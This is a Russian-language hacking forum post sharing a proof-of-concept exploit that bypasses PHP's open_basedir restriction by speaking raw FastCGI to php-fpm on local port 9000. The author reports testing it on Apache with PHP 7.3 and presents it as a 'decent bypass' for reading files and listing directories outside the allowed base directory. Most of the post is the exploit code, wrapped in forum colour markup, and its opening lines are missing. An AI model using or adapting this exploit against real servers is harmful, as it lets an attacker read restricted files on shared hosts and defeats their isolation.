23.12.2019, 20:16
|
|
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
С нами:
4033046
Репутация:
212
|
|
Каким-то странным образом пропустил такую вот интересную штуку
https://bugs.php.net/bug.php?id=70134
В данном случае нам позволяют не только листить диры, но и читать файлы за бэйздиром
Соответственно важно чтобы fpm крутился на 9000 порту
Протестировано на apache + php-fpm 7.3
+1 в копилочку нормальных байпасов
poc прикрепляю как есть
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$params_encoded[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#0000BB"]$k[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]$len[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$params_encoded[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$len_encoded[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$len[/COLOR][COLOR="#007700"]>>[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$len[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]255[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'127.0.0.1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9000[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x01\x04\x00\x01"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$len_encoded[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\x00\x00"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$params_encoded[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x01\x04\x00\x01\x00\x00\x00\x00"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x01\x05\x00\x01\x00\x00\x00\x00"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]sleep[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fp[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$matches[/COLOR][COLOR="#007700"]= array();
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/START.*END/s'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$matches[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#0000BB"]$matches[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
|
|
|